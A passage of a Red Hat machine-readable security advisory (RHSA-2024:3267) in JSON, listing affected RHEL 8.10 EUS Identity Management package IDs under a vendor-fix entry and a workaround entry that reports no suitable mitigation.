"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
